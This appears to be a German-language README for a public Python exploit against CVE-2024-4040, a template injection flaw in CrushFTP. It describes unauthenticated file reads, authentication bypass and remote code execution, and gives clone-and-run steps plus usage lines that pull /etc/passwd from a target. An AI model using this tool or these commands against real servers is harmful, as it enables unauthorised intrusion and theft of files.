
Eine serverseitige Template-Injection-Schwachstelle in CrushFTP in allen Versionen vor 10.7.1 und 11.1.0 auf allen Plattformen ermöglicht es nicht authentifizierten Angreifern, Dateien aus dem Dateisystem außerhalb der VFS-Sandbox zu lesen, die Authentifizierung zu umgehen, um administrative Zugriffe zu erlangen, und Remote-Code-Ausführung auf dem Server durchzuführen.
Python Exploit für CVE-2024-4040
Eine Server-Side-Template-Injection-Schwachstelle in CrushFTP in allen Versionen vor 10.7.1 und 11.1.0 auf allen Plattformen ermöglicht es nicht authentifizierten Remote-Angreifern, Dateien außerhalb des VFS-Sandbox-Dateisystems zu lesen, die Authentifizierung zu umgehen, um administrativen Zugriff zu erlangen, und Remote-Code-Ausführung auf dem Server durchzuführen.
-h --help Show this screen.
-t --target Specify target URL
-f --file Specify file to include
Only test if vulnerable: exploit.py -t http://10.10.1.23:8080
Include /etc/passwd: exploit.py -t http://10.10.1.23:8080 -f /etc/passwd
git clone https://github.com/1ncendium/CVE-2024-4040.git
cd CVE-2024-4040
python3 exploit.py -t http://target:8080